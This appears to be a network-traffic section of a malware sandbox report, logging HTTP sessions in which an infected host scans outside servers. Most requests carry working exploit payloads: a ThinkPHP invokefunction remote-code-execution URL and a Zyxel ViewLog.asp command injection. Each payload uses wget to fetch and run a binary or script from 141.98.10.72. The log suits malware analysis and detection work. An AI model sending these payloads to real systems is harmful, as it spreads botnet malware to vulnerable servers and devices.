                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      611192.168.2.155612295.181.129.22080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.657488108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:19.935024977 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:19 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      612192.168.2.154430488.249.66.4680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:19.848334074 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:20.135513067 CET70INHTTP/1.1 404 Page not foundContent-Length: 0Connection: Keep-Alive
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      613192.168.2.154869485.214.76.1368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.122267962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.345863104 CET377INHTTP/1.0 400 Bad Request
                                                      Server: Icecast 2.4.4
                                                      Connection: Close
                                                      Date: Wed, 14 Feb 2024 08:30:20 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store
                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                      Pragma: no-cache
                                                      Access-Control-Allow-Origin: *
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 62 3e 34 30 30 20 2d 20 75 6e 6b 6e 6f 77 6e 20 72 65 71 75 65 73 74 3c 2f 62 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>Error 400</title></head><body><b>400 - unknown request</b></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      614192.168.2.1551232119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.159456968 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 31 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:51Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      615192.168.2.153483862.68.75.208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.323303938 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.522063017 CET350INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:20 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 146
                                                      Connection: keep-alive
                                                      X-Frame-Options: SAMEORIGIN
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      616192.168.2.155680231.136.89.728080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.325779915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.952651024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.200601101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.664669991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:29.784514904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.768135071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.735505104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694504023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      617192.168.2.154353295.181.244.2368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.347364902 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      618192.168.2.154687431.136.221.698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.525424004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.144638062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.392693043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920564890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:30.040606022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:40.024272919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.735516071 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694444895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      619192.168.2.153657294.130.36.398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.533004045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:20.743199110 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:30:20 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      620192.168.2.154841631.136.91.308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:20.565359116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.240663052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:22.584635973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:25.432552099 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
